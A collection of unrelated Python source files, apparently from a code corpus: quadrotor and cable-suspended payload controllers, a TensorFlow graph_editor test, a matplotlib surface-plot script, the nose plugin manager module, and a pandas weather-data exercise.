## Parameter Initialization
quat_des = ql["quat_des"]
omega_des = ql["omega_des"]
g = params.grav
m = params.mass
e3 = np.array([[0],[0],[1]])
Rot = ql["rot"]
omega_asym = vec2asym(ql["omega"])
Rot_des = utilslib.QuatToRot(quat_des)
## Position control
# jerk_des = ql.jerk_des;
# Position error
ep = ql["pos_des"]-ql["pos"]
# Velocity error
ed = ql["vel_des"]-ql["vel"]
# Desired acceleration This equation drives the errors of trajectory to zero.
acceleration_des = ql["acc_des"] + np.matmul(params.Kp, ep) + np.matmul(params.Kd, ed)
# Net force F=kx*ex kv*ex_dot + mge3 +mxdes_ddot
F = m*g*e3 + m*acceleration_des
## Attitude Control
# Errors of anlges and angular velocities
e_Rot = np.matmul(np.transpose(Rot_des), Rot) - np.matmul(np.transpose(Rot), Rot_des)
e_angle = vee(e_Rot)/2
e_omega = ql["omega"] - np.matmul(np.matmul(np.transpose(Rot), Rot_des), np.transpose(omega_des))
# Net moment
# Missing the angular acceleration term but in general it is neglectable.
M = - np.matmul(params.Kpe, e_angle) - np.matmul(params.Kde, e_omega)
## Cable tension distribution
diag_rot = np.array([[]])
for i in range(1, params.nquad+1):
diag_rot = scipy.linalg.block_diag(diag_rot,Rot)
mu = np.matmul(np.matmul(diag_rot, params.pseudo_inv_P), np.vstack(np.matmul(np.transpose(Rot), F), M))
for i in range(1, params.nquad+1):
if mu[3*i-1]<0:
mu[3*i-1] = 0
att_acc_c = acceleration_des + g @ e3 + Rot @ omega_asym @ omega_asym @ params.rho_vec_list
return mu,att_acc_c
# untested
def geometric_controller(self, qd, t, qn, params):
if self.gd.size == 0:
self.gd = np.zeros((0,3), dtype= float)
self.icnt = 0
self.icnt += 1
## Parameter Initialization
yaw_des = qd[qn]["yaw_des"]
yawdot_des = qd[qn]["yawdot_des"]
g = params.grav
m = params.mass
phi = qd[qn]["euler"][0]
theta = qd[qn]["euler"][1]
psi = qd[qn]["euler"][2]
e3 = np.array([[0], [0], [1]])
# The rotation matrix in this function is world to body [bRw] you will
# need to transpose this matrix to get the body to world [wRb] such that
# [wP] = [wRb] * [bP], where [bP] is a point in the body frame and [wP]
# is a point in the world frame
Rot_worldtobody = RPYtoRot_ZXY(phi, theta, psi)
## Position control
jerk_des = qd[qn]["jerk_des"]
# Position error
ep = qd[qn]["pos_des"]-qd[qn]["pos"]
# Velocity error
ed = qd[qn]["vel_des"]-qd[qn]["vel"]
# Desired acceleration This equation drives the errors of trajectory to zero.
acceleration_des = qd[qn]["acc_des"] + params.Kp @ ep + params.Kd @ ed;
# Thurst f=(kx*ex kv*ex_dot + mge3 +mxdes_ddot)*Re3
Force = m*g*e3 + m*acceleration_des
F = np.transpose(Force) @ np.transpose(Rot_worldtobody) @ e3
## Attitude Control
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:,2] = Z_body_in_world
X_unit = np.vstack(np.cos(yaw_des), np.sin(yaw_des), 0)
Y_body_in_world = np.cross(Z_body_in_world,X_unit)
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1] = Y_body_in_world
X_body_in_world = np.cross(Y_body_in_world,Z_body_in_world)
Rot_des[:,0] = X_body_in_world
# Errors of anlges and angular velocities
e_Rot = np.transpose(Rot_des) @ np.transpose(Rot_worldtobody) - Rot_worldtobody @ Rot_des
e_angle = vee(e_Rot)/2
p_des = -(m/F) * np.transpose(jerk_des - (np.transpose(Z_body_in_world) @ jerk_des) @ Z_body_in_world) @ Y_body_in_world
q_des = (m/F) * np.transpose(jerk_des - (np.transpose(Z_body_in_world) @ jerk_des) @ Z_body_in_world) @ X_body_in_world
r_des = yawdot_des * Z_body_in_world[2]
e_omega = qd[qn]["omega"] - Rot_worldtobody @ Rot_des @ np.transpose(np.hstack(p_des, q_des, r_des))
# Moment
# Missing the angular acceleration term but in general it is neglectable.
M = - params.Kpe @ e_angle - params.Kde @ e_omega + np.cross(qd[qn]["omega"], params.I*qd[qn]["omega"])
# =================== Your code ends here ===================
# Output trpy and drpy as in hardware
trpy = np.array([0,0,0,0])
drpy = np.array([0,0,0,0])
return F, M, trpy, drpy
# untested
def hover_controller(self, qd, t, qn, params):
if self.gd.size == 0:
self.gd = np.zeros((0,3), dtype= float)
self.icnt = 0
self.icnt += 1
# position_now = qd{qn}.pos;
# velocity_now = qd{qn}.vel;
# Eulerangle_now = qd{qn}.euler;
# omega_now = qd{qn}.omega;
# position_tra = qd{qn}.pos_des;
# velocity_tra = qd{qn}.vel_des;
# acceleration_tra = qd{qn}.acc_des;
## Parameter Initialization
yaw_des = qd[qn]["yaw_des"]
yawdot_des = qd[qn]["yawdot_des"]
g = params.grav
m = params.mass
# Gain matrices
Kp_pos = np.array([[5, 0, 0],
[0, 5, 0],
[0, 0, 150]])
Kp_att = np.array([[5, 0, 0],
[0, 5, 0],
[0, 0, 150]])
Kd_att = np.array([[5.5, 0, 0],
[0, 5.5, 0],
[0, 0, 150]])
Ki_att = np.array([[0.004, 0, 0],
[0, 0.004, 0],
[0, 0, 0.004]])
Kpe = np.array([[0.1, 0, 0],
[0, 0.1, 0],
[0, 0, 0.2]])
Kde = np.array([[0.004, 0, 0],
[0, 0.004, 0],
[0, 0, 0.004]])
## Position control
# Position error
e_pos = qd[qn]["pos_des"]-qd[qn]["pos"]
vel_des = Kp_pos @ e_pos
# Velocity error
e_vel = vel_des-qd[qn]["vel"]
## Hover controller
# Desired acceleration This equation drives the errors of trajectory to zero.
acceleration_des = qd[qn]["acc_des"] + params.Kp @ e_pos + params.Kd @ e_vel
# Desired roll, pitch and yaw
phi_des = (acceleration_des[0]*np.sin(yaw_des)-acceleration_des[1]*np.cos(yaw_des))/g
theta_des = (acceleration_des[0]*np.cos(yaw_des)+acceleration_des[1]*np.sin(yaw_des))/g
psi_des = yaw_des
# Errors of anlges and angular velocities
e_angle = np.transpose(np.hstack(phi_des, theta_des, psi_des)) - qd[qn]["euler"]
e_omega = np.transpose(np.hstack(0, 0, yawdot_des)) - qd[qn]["omega"]
# Thurst
F = m*g + m*acceleration_des[2]
# Moment
M = Kpe @ e_angle + Kde @ e_omega
#
self.gd[self.icnt-1,:] = np.hstack(t, phi_des, qd[qn]["euler"][0]) # for graphing
# Output trpy and drpy as in hardware
trpy = np.array([0,0,0,0])
drpy = np.array([0,0,0,0])
return F, M, trpy, drpy
def rigid_links_cooperative_payload_controller(self, ql, params):
# DESCRIPTION:
# Controller for rigid link connected payload and MAV(s)
# INPUTS:
# ql - a dictionary containing state of the payload, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 payload position
# 'vel' ndarray 3 by 1 payload velocity
# 'quat' ndarray 4 by 1 payload orientation as unit quaternion
# 'omega' ndarray 3 by 1 payload angular velocity
# 'rot' ndarray 3 by 3 payload rotation as rotation matrix
# 'pos_des' ndarray 3 by 1 desired payload position
# 'vel_des' ndarray 3 by 1 desired payload velocity
# 'acc_des' ndarray 3 by 1 desired payload acceleration
# 'jrk_des' ndarray 3 by 1 desired payload jerk
# 'quat_des' ndarray 4 by 1 desired payload orientation as unit quaterion
# set to [[1.], [0.], [0.], [0.]] currently
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# 'qd_yaw_des' float NA desired MAV yaw, set to 0.0 current
# 'qd_yawdot_des' float NA time derivative of desired MAV yaw, set to 0.0 currently
# params - a read_params class object containing payload parameters
# OUTPUTS:
# uav_F - a dictionary with one field (key = '0'), a 3 by 1 ndarray denoting the desired force
# uav_F {0: array([[Fx],
# [Fy],
# [Fz]])}
# uav_M - a dictionary with one field (key = '0'), a 3 by 1 ndarray denoting the desired moment
# uav_F {0: array([[Mx],
# [My],
# [Mz]])}
if not params.sim_start:
self.icnt = 0
self.icnt = self.icnt + 1
## Parameter Initialization
quat_des = ql["quat_des"]
yaw_des = 0
omega_des = ql["omega_des"]
g = params.grav
m = params.struct_mass
e3 = np.array([[0],[0],[1]])
Rot = ql["rot"]
omega = ql["omega"]
## Position control
# Position error
ep = ql["pos_des"]-ql["pos"]
# Velocity error
ed = ql["vel_des"]-ql["vel"]
ep = ep.reshape((3,1))
ed = ed.reshape((3,1))
# Desired acceleration This equation drives the errors of trajectory to zero.
acceleration_des = ql["acc_des"] + params.Kp @ ep + params.Kd @ ed
Force = m*g*e3 + m*acceleration_des
tau = np.transpose(Force) @ Rot @ e3
## Attitude Control
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:,2:3] = Z_body_in_world
X_unit = np.array([[np.cos(yaw_des)], [np.sin(yaw_des)], [0]])
Y_body_in_world = np.cross(Z_body_in_world,X_unit, axisa=0, axisb=0).T
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1:2] = Y_body_in_world
X_body_in_world = np.cross(Y_body_in_world,Z_body_in_world, axisa=0, axisb=0).T
Rot_des[:,0:1] = X_body_in_world
# Errors of anlges and angular velocities
e_Rot = np.transpose(Rot_des) @ Rot - np.transpose(Rot) @ Rot_des
e_angle = vee(e_Rot)/2
e_omega = omega.reshape((3,1)) - np.transpose(Rot) @ Rot_des @ omega_des.reshape((3, 1))
# Net moment
# Missing the angular acceleration term but in general it is neglectable.
M = - params.Kpe @ e_angle - params.Kde @ e_omega + np.cross(omega, params.struct_I @ omega, axisa=0, axisb=0).reshape((3,1))
## Quadrotor Thrust and Moment Distribution
u = params.thrust_moment_distribution_mat @ np.vstack((tau, M))
u = params.A @ u
uav_F_arr = u[0] * Rot[:,2].reshape((3,1))
uav_M_arr = u[1:4]
# convert u into uav_F and uav_M
uav_F = {}
uav_F[0] = uav_F_arr
uav_M = {}
uav_M[0] = uav_M_arr
return uav_F, uav_M
def single_payload_geometric_controller(self, ql, qd_params, pl_params):
# DESCRIPTION:
# Controller for rigid link connected payload and MAV(s)
# INPUTS:
# ql - a dictionary containing state of the payload and MAV combined, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 payload position
# 'vel' ndarray 3 by 1 payload velocity
# 'qd_pos' ndarray 3 by 1 MAV position
# 'qd_vel' ndarray 3 by 1 MAV velocity
# 'qd_quat' ndarray 4 by 1 MAV orientation as unit quaternion
# 'qd_omega' ndarray 3 by 1 MAV angular velocity
# 'qd_rot' ndarray 3 by 3 MAV orientation as rotation matrix
# 'pos_des' ndarray 3 by 1 desired payload position
# 'vel_des' ndarray 3 by 1 desired payload velocity
# 'acc_des' ndarray 3 by 1 desired payload acceleration
# 'jrk_des' ndarray 3 by 1 desired payload jerk
# 'quat_des' ndarray 4 by 1 desired payload orientation as unit quaterion
# set to [[1.], [0.], [0.], [0.]] currently
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# 'qd_yaw_des' float NA desired MAV yaw, set to 0.0 current
# 'qd_yawdot_des' float NA time derivative of desired MAV yaw, set to 0.0 currently
# pl_params - a read_params class object containing payload parameters
# qd_params - a read_params class objects containing all MAV parameters
# OUTPUTS:
# F - a 1 by 1 ndarray, denoting the thrust force
# M - a list of size 3, containing three 1d ndarray of size 1, denoting the moment
# M = [[array([Mx])]
# [array([My])]
# [array([Mz])]]
## Parameter Initialization
if not pl_params.sim_start:
self.icnt = 0
g = pl_params.grav
e3 = np.array([[0],[0],[1]])
self.icnt = self.icnt + 1
quad_m = qd_params.mass
pl_m = pl_params.mass
l = pl_params.cable_length
## State Initialization
quad_load_rel_pos = ql["qd_pos"]-ql["pos"]
quad_load_rel_vel = ql["qd_vel"]-ql["vel"]
quad_load_distance = np.linalg.norm(quad_load_rel_pos)
xi_ = -quad_load_rel_pos/quad_load_distance
xixiT_ = xi_ @ np.transpose(xi_)
xidot_ = -quad_load_rel_vel/quad_load_distance
xi_asym_ = vec2asym(xi_)
w_ = np.cross(xi_, xidot_, axisa=0, axisb=0).T
Rot_worldtobody = ql["qd_rot"]
## Payload Position control
#Position error
ep = ql["pos_des"]-ql["pos"]
#Velocity error
ed = ql["vel_des"]-ql["vel"]
# Desired acceleration This equation drives the errors of trajectory to zero.
acceleration_des = ql["acc_des"] + g*e3 + pl_params.Kp @ ep + pl_params.Kd @ ed
# Desired yaw and yawdot
yaw_des = ql["qd_yaw_des"] # This can remain for Quad
yawdot_des = ql["qd_yawdot_des"]
## Cable Direction Control
# Desired cable direction
mu_des_ = (quad_m + pl_m) * acceleration_des + quad_m * l * (np.transpose(xidot_) @ xidot_) * xi_
xi_des_ = -mu_des_ / np.linalg.norm(mu_des_)
xi_des_dot_ = np.zeros((3, 1), dtype=float)
w_des_ = np.cross(xi_des_, xi_des_dot_, axisa=0, axisb=0).T
w_des_dot_ = np.zeros((3, 1), dtype=float)
mu_ = xixiT_ @ mu_des_
e_xi = np.cross(xi_des_, xi_, axisa=0, axisb=0).T
e_w = w_ + xi_asym_ @ xi_asym_ @ w_des_
Force = mu_ - quad_m*l*np.cross(xi_, qd_params.Kxi @ e_xi + qd_params.Kw @ e_w+ (xi_.T @ w_des_) * xidot_ + xi_asym_ @ xi_asym_ @ w_des_dot_, axisa=0, axisb=0).T
F = np.transpose(Force) @ Rot_worldtobody @ e3
# Attitude Control
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:,2:3] = Z_body_in_world
X_unit = np.array([[np.cos(yaw_des)], [np.sin(yaw_des)], [0]])
Y_body_in_world = np.cross(Z_body_in_world, X_unit, axisa=0, axisb=0).T
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1:2] = Y_body_in_world
X_body_in_world = np.cross(Y_body_in_world,Z_body_in_world, axisa=0, axisb=0).T
Rot_des[:,0:1] = X_body_in_world
# Errors of anlges and angular velocities
e_Rot = np.transpose(Rot_des) @ Rot_worldtobody - Rot_worldtobody.T @ Rot_des
e_angle = vee(e_Rot)/2
p_des = 0.0
q_des = 0.0
r_des = yawdot_des*Z_body_in_world[2]
e_omega = ql["qd_omega"] - Rot_worldtobody.T @ Rot_des @ np.array([[p_des], [q_des], [r_des]])
# Moment
# Missing the angular acceleration term but in general it is neglectable.
M = - qd_params.Kpe @ e_angle - qd_params.Kde @ e_omega + np.cross(ql["qd_omega"],qd_params.I @ ql["qd_omega"], axisa=0, axisb=0).T
return F, M
|
the-stack_0_6469 | # pylint: disable=g-bad-file-header
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.contrib.graph_editor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import graph_editor as ge
class SubgraphviewTest(tf.test.TestCase):
def test_simple_swap(self):
g = tf.Graph()
with g.as_default():
a0 = tf.constant(1.0, shape=[2], name="a0")
b0 = tf.constant(2.0, shape=[2], name="b0")
c0 = tf.add(a0, b0, name="c0")
a1 = tf.constant(3.0, shape=[2], name="a1")
b1 = tf.constant(4.0, shape=[2], name="b1")
c1 = tf.add(a1, b1, name="b1")
ge.util.swap_ts([a0, b0], [a1, b1])
assert c0.op.inputs[0] == a1 and c0.op.inputs[1] == b1
assert c1.op.inputs[0] == a0 and c1.op.inputs[1] == b0
if __name__ == "__main__":
tf.test.main()
|
the-stack_0_6473 | """
Script used to create surface plots to illustrate
(stochastic) gradient descent in chapter 5.
"""
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
# Initialize figure
fig = plt.figure()
ax = fig.gca(projection='3d')
# Make data.
X = np.arange(-2, 2, 0.3)
Y = np.arange(-2, 2, 0.3)
X, Y = np.meshgrid(X, Y)
R = Y * np.sin(X) - X * np.cos(Y)
Z = np.sin(R)
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
linewidth=0, antialiased=False)
# Customize the z axis.
ax.set_zlim(-1.0, 1.0)
ax.zaxis.set_major_locator(LinearLocator(8))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.01f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
# Show plot
plt.show()
|
the-stack_0_6474 | """
Plugin Manager
--------------
A plugin manager class is used to load plugins, manage the list of
loaded plugins, and proxy calls to those plugins.
The plugin managers provided with nose are:
:class:`PluginManager`
This manager doesn't implement loadPlugins, so it can only work
with a static list of plugins.
:class:`BuiltinPluginManager`
This manager loads plugins referenced in ``nose.plugins.builtin``.
:class:`EntryPointPluginManager`
This manager uses setuptools entrypoints to load plugins.
:class:`ExtraPluginsPluginManager`
This manager loads extra plugins specified with the keyword
`addplugins`.
:class:`DefaultPluginMananger`
This is the manager class that will be used by default. If
setuptools is installed, it is a subclass of
:class:`EntryPointPluginManager` and :class:`BuiltinPluginManager`;
otherwise, an alias to :class:`BuiltinPluginManager`.
:class:`RestrictedPluginManager`
This manager is for use in test runs where some plugin calls are
not available, such as runs started with ``python setup.py test``,
where the test runner is the default unittest :class:`TextTestRunner`. It
is a subclass of :class:`DefaultPluginManager`.
Writing a plugin manager
========================
If you want to load plugins via some other means, you can write a
plugin manager and pass an instance of your plugin manager class when
instantiating the :class:`nose.config.Config` instance that you pass to
:class:`TestProgram` (or :func:`main` or :func:`run`).
To implement your plugin loading scheme, implement ``loadPlugins()``,
and in that method, call ``addPlugin()`` with an instance of each plugin
you wish to make available. Make sure to call
``super(self).loadPlugins()`` as well if have subclassed a manager
other than ``PluginManager``.
"""
import inspect
import logging
import os
import sys
from itertools import chain as iterchain
from warnings import warn
import nose.config
from nose.failure import Failure
from nose.plugins.base import IPluginInterface
from nose.pyversion import sort_list
try:
import pickle as pickle
except:
import pickle
try:
from io import StringIO
except:
from io import StringIO
__all__ = ['DefaultPluginManager', 'PluginManager', 'EntryPointPluginManager',
'BuiltinPluginManager', 'RestrictedPluginManager']
log = logging.getLogger(__name__)
class PluginProxy(object):
"""Proxy for plugin calls. Essentially a closure bound to the
given call and plugin list.
The plugin proxy also must be bound to a particular plugin
interface specification, so that it knows what calls are available
and any special handling that is required for each call.
"""
interface = IPluginInterface
def __init__(self, call, plugins):
try:
self.method = getattr(self.interface, call)
except AttributeError:
raise AttributeError("%s is not a valid %s method"
% (call, self.interface.__name__))
self.call = self.makeCall(call)
self.plugins = []
for p in plugins:
self.addPlugin(p, call)
def __call__(self, *arg, **kw):
return self.call(*arg, **kw)
def addPlugin(self, plugin, call):
"""Add plugin to my list of plugins to call, if it has the attribute
I'm bound to.
"""
meth = getattr(plugin, call, None)
if meth is not None:
if call == 'loadTestsFromModule' and \
len(inspect.getargspec(meth)[0]) == 2:
orig_meth = meth
meth = lambda module, path, **kwargs: orig_meth(module)
self.plugins.append((plugin, meth))
def makeCall(self, call):
if call == 'loadTestsFromNames':
# special case -- load tests from names behaves somewhat differently
# from other chainable calls, because plugins return a tuple, only
# part of which can be chained to the next plugin.
return self._loadTestsFromNames
meth = self.method
if getattr(meth, 'generative', False):
# call all plugins and yield a flattened iterator of their results
return lambda *arg, **kw: list(self.generate(*arg, **kw))
elif getattr(meth, 'chainable', False):
return self.chain
else:
# return a value from the first plugin that returns non-None
return self.simple
def chain(self, *arg, **kw):
"""Call plugins in a chain, where the result of each plugin call is
sent to the next plugin as input. The final output result is returned.
"""
result = None
# extract the static arguments (if any) from arg so they can
# be passed to each plugin call in the chain
static = [a for (static, a)
in zip(getattr(self.method, 'static_args', []), arg)
if static]
for p, meth in self.plugins:
result = meth(*arg, **kw)
arg = static[:]
arg.append(result)
return result
def generate(self, *arg, **kw):
"""Call all plugins, yielding each item in each non-None result.
"""
for p, meth in self.plugins:
result = None
try:
result = meth(*arg, **kw)
if result is not None:
for r in result:
yield r
except (KeyboardInterrupt, SystemExit):
raise
except:
exc = sys.exc_info()
yield Failure(*exc)
continue
def simple(self, *arg, **kw):
"""Call all plugins, returning the first non-None result.
"""
for p, meth in self.plugins:
result = meth(*arg, **kw)
if result is not None:
return result
def _loadTestsFromNames(self, names, module=None):
"""Chainable but not quite normal. Plugins return a tuple of
(tests, names) after processing the names. The tests are added
to a suite that is accumulated throughout the full call, while
names are input for the next plugin in the chain.
"""
suite = []
for p, meth in self.plugins:
result = meth(names, module=module)
if result is not None:
suite_part, names = result
if suite_part:
suite.extend(suite_part)
return suite, names
class NoPlugins(object):
"""Null Plugin manager that has no plugins."""
interface = IPluginInterface
def __init__(self):
self._plugins = self.plugins = ()
def __iter__(self):
return ()
def _doNothing(self, *args, **kwds):
pass
def _emptyIterator(self, *args, **kwds):
return ()
def __getattr__(self, call):
method = getattr(self.interface, call)
if getattr(method, "generative", False):
return self._emptyIterator
else:
return self._doNothing
def addPlugin(self, plug):
raise NotImplementedError()
def addPlugins(self, plugins):
raise NotImplementedError()
def configure(self, options, config):
pass
def loadPlugins(self):
pass
def sort(self):
pass
class PluginManager(object):
"""Base class for plugin managers. PluginManager is intended to be
used only with a static list of plugins. The loadPlugins() implementation
only reloads plugins from _extraplugins to prevent those from being
overridden by a subclass.
The basic functionality of a plugin manager is to proxy all unknown
attributes through a ``PluginProxy`` to a list of plugins.
Note that the list of plugins *may not* be changed after the first plugin
call.
"""
proxyClass = PluginProxy
def __init__(self, plugins=(), proxyClass=None):
self._plugins = []
self._extraplugins = ()
self._proxies = {}
if plugins:
self.addPlugins(plugins)
if proxyClass is not None:
self.proxyClass = proxyClass
def __getattr__(self, call):
try:
return self._proxies[call]
except KeyError:
proxy = self.proxyClass(call, self._plugins)
self._proxies[call] = proxy
return proxy
def __iter__(self):
return iter(self.plugins)
def addPlugin(self, plug):
# allow, for instance, plugins loaded via entry points to
# supplant builtin plugins.
new_name = getattr(plug, 'name', object())
self._plugins[:] = [p for p in self._plugins
if getattr(p, 'name', None) != new_name]
self._plugins.append(plug)
def addPlugins(self, plugins=(), extraplugins=()):
"""extraplugins are maintained in a separate list and
re-added by loadPlugins() to prevent their being overwritten
by plugins added by a subclass of PluginManager
"""
self._extraplugins = extraplugins
for plug in iterchain(plugins, extraplugins):
self.addPlugin(plug)
def configure(self, options, config):
"""Configure the set of plugins with the given options
and config instance. After configuration, disabled plugins
are removed from the plugins list.
"""
log.debug("Configuring plugins")
self.config = config
cfg = PluginProxy('configure', self._plugins)
cfg(options, config)
enabled = [plug for plug in self._plugins if plug.enabled]
self.plugins = enabled
self.sort()
log.debug("Plugins enabled: %s", enabled)
def loadPlugins(self):
for plug in self._extraplugins:
self.addPlugin(plug)
def sort(self):
return sort_list(self._plugins, lambda x: getattr(x, 'score', 1), reverse=True)
def _get_plugins(self):
return self._plugins
def _set_plugins(self, plugins):
self._plugins = []
self.addPlugins(plugins)
plugins = property(_get_plugins, _set_plugins, None,
"""Access the list of plugins managed by
this plugin manager""")
class ZeroNinePlugin:
"""Proxy for 0.9 plugins, adapts 0.10 calls to 0.9 standard.
"""
def __init__(self, plugin):
self.plugin = plugin
def options(self, parser, env=os.environ):
self.plugin.add_options(parser, env)
def addError(self, test, err):
if not hasattr(self.plugin, 'addError'):
return
# switch off to addSkip, addDeprecated if those types
from nose.exc import SkipTest, DeprecatedTest
ec, ev, tb = err
if issubclass(ec, SkipTest):
if not hasattr(self.plugin, 'addSkip'):
return
return self.plugin.addSkip(test.test)
elif issubclass(ec, DeprecatedTest):
if not hasattr(self.plugin, 'addDeprecated'):
return
return self.plugin.addDeprecated(test.test)
# add capt
capt = test.capturedOutput
return self.plugin.addError(test.test, err, capt)
def loadTestsFromFile(self, filename):
if hasattr(self.plugin, 'loadTestsFromPath'):
return self.plugin.loadTestsFromPath(filename)
def addFailure(self, test, err):
if not hasattr(self.plugin, 'addFailure'):
return
# add capt and tbinfo
capt = test.capturedOutput
tbinfo = test.tbinfo
return self.plugin.addFailure(test.test, err, capt, tbinfo)
def addSuccess(self, test):
if not hasattr(self.plugin, 'addSuccess'):
return
capt = test.capturedOutput
self.plugin.addSuccess(test.test, capt)
def startTest(self, test):
if not hasattr(self.plugin, 'startTest'):
return
return self.plugin.startTest(test.test)
def stopTest(self, test):
if not hasattr(self.plugin, 'stopTest'):
return
return self.plugin.stopTest(test.test)
def __getattr__(self, val):
return getattr(self.plugin, val)
class EntryPointPluginManager(PluginManager):
"""Plugin manager that loads plugins from the `nose.plugins` and
`nose.plugins.0.10` entry points.
"""
entry_points = (('nose.plugins.0.10', None),
('nose.plugins', ZeroNinePlugin))
def loadPlugins(self):
"""Load plugins by iterating the `nose.plugins` entry point.
"""
from pkg_resources import iter_entry_points
loaded = {}
for entry_point, adapt in self.entry_points:
for ep in iter_entry_points(entry_point):
if ep.name in loaded:
continue
loaded[ep.name] = True
log.debug('%s load plugin %s', self.__class__.__name__, ep)
try:
plugcls = ep.load()
except KeyboardInterrupt:
raise
except Exception as e:
# never want a plugin load to kill the test run
# but we can't log here because the logger is not yet
# configured
warn("Unable to load plugin %s: %s" % (ep, e),
RuntimeWarning)
continue
if adapt:
plug = adapt(plugcls())
else:
plug = plugcls()
self.addPlugin(plug)
super(EntryPointPluginManager, self).loadPlugins()
class BuiltinPluginManager(PluginManager):
"""Plugin manager that loads plugins from the list in
`nose.plugins.builtin`.
"""
def loadPlugins(self):
"""Load plugins in nose.plugins.builtin
"""
from nose.plugins import builtin
for plug in builtin.plugins:
self.addPlugin(plug())
super(BuiltinPluginManager, self).loadPlugins()
try:
import pkg_resources
class DefaultPluginManager(EntryPointPluginManager, BuiltinPluginManager):
pass
except ImportError:
class DefaultPluginManager(BuiltinPluginManager):
pass
class RestrictedPluginManager(DefaultPluginManager):
"""Plugin manager that restricts the plugin list to those not
excluded by a list of exclude methods. Any plugin that implements
an excluded method will be removed from the manager's plugin list
after plugins are loaded.
"""
def __init__(self, plugins=(), exclude=(), load=True):
DefaultPluginManager.__init__(self, plugins)
self.load = load
self.exclude = exclude
self.excluded = []
self._excludedOpts = None
def excludedOption(self, name):
if self._excludedOpts is None:
from optparse import OptionParser
self._excludedOpts = OptionParser(add_help_option=False)
for plugin in self.excluded:
plugin.options(self._excludedOpts, env={})
return self._excludedOpts.get_option('--' + name)
def loadPlugins(self):
if self.load:
DefaultPluginManager.loadPlugins(self)
allow = []
for plugin in self.plugins:
ok = True
for method in self.exclude:
if hasattr(plugin, method):
ok = False
self.excluded.append(plugin)
break
if ok:
allow.append(plugin)
self.plugins = allow
|
the-stack_0_6477 | # --------------
#Importing the modules
import pandas as pd
import numpy as np
from scipy.stats import mode
def categorical(df):
""" Extract names of categorical column
This function accepts a dataframe and returns categorical list,
containing the names of categorical columns(categorical_var).
"""
categorical_var= df.select_dtypes(include='object').columns.tolist()
return categorical_var
def numerical(df):
""" Extract names of numerical column
This function accepts a dataframe and returns numerical list,
containing the names of numerical columns(numerical_var).
"""
numerical_var = df.select_dtypes(include='number').columns.tolist()
return numerical_var
def clear(df,col,val):
""" Check distribution of variable
This function accepts a dataframe,column(feature) and value which returns count of the value,
containing the value counts of a variable(value_counts)
"""
value_counts = df[col].value_counts()[val]
return value_counts
def instances_based_condition(df,col1,val1,col2,val2):
""" Instances based on the condition
This function accepts a dataframe, 2 columns(feature) and 2 values which returns the dataframe
based on the condition.
"""
instance = df[(df[col1] > val1) & (df[col2]== val2)]
return instance
def agg_values_ina_month(df,date_col,agg_col, agg):
""" Aggregate values according to month
This function accepts a dataframe, 2 columns(feature) and aggregated funcion(agg) which returns the Pivot
table with different aggregated value of the feature with an index of the month.
"""
df[date_col] = pd.to_datetime(df[date_col])
aggregate = {'mean':np.mean,'max':np.max,'min':np.min,'sum':np.sum,'len':len}
aggregated_value = df.pivot_table(values=[agg_col], index=df[date_col].dt.month,aggfunc={agg_col:aggregate[agg]})
return aggregated_value
# Code to group values based on the feature
def group_values(df,col1,agg1):
""" Agrregate values by grouping
This function accepts a dataframe, 1 column(feature) and aggregated function(agg1) which groupby the datframe based on the column.
"""
aggregate = {'mean':np.mean,'max':np.max,'min':np.min,'sum':np.sum,'len':len}
grouping = df.groupby(col1).agg(aggregate[agg1])
return grouping
# function for conversion
def convert(df,celsius):
""" Convert temperatures from celsius to fahrenhheit
This function accepts a dataframe, 1 column(feature) which returns the dataframe with converted values from
celsius to fahrenhheit.
"""
centigrade_temps = df[celsius]
converted_temp = 1.8*centigrade_temps + 32
return converted_temp
# Load the weather_2012 data csv file and store it in weather variable.
weather = pd.read_csv(path)
weather.head()
# Check the categorical and numerical variables. You can check it by calling categorical and numerical function.
print(categorical(weather))
print(numerical(weather))
#Checking the distribution of a specific value like the number of times the weather was exactly Cloudy in the given column.
#You can check it by calling the function clear with respective parameters.
print(clear(weather,"Weather",'Clear'))
print(clear(weather,"Wind Spd (km/h)", 4))
#Check some instances based on a specific condition like when the wind speed was above 35 and visibility was 25.
#Check it by calling the function instances_based_condition with respective parameters.
wind_speed_35_vis_25 = instances_based_condition(weather,'Wind Spd (km/h)',35,'Visibility (km)',25)
#Calculate the mean temperature recorded by month from temperature data. Generate a pivot table which contains the aggregated values(like mean, max ,min, sum, len) recoreded by month.
#Call the function agg_values_ina_month with respective parameters.
agg_values_ina_month(weather,'Date/Time','Dew Point Temp (C)','mean')
# To groupby based on a column like on Weather column and then aggregate the mean values of each column for different types of weather using mean.
#Call the function group_values.
mean_weather = group_values(weather,"Weather",'mean')
# Convert celsius temperature into fahrehheit temperatures from temperature data by calling the function convert.
weather_fahrehheit = convert(weather,"Temp (C)")
|
the-stack_0_6478 | #!/usr/bin/env python3
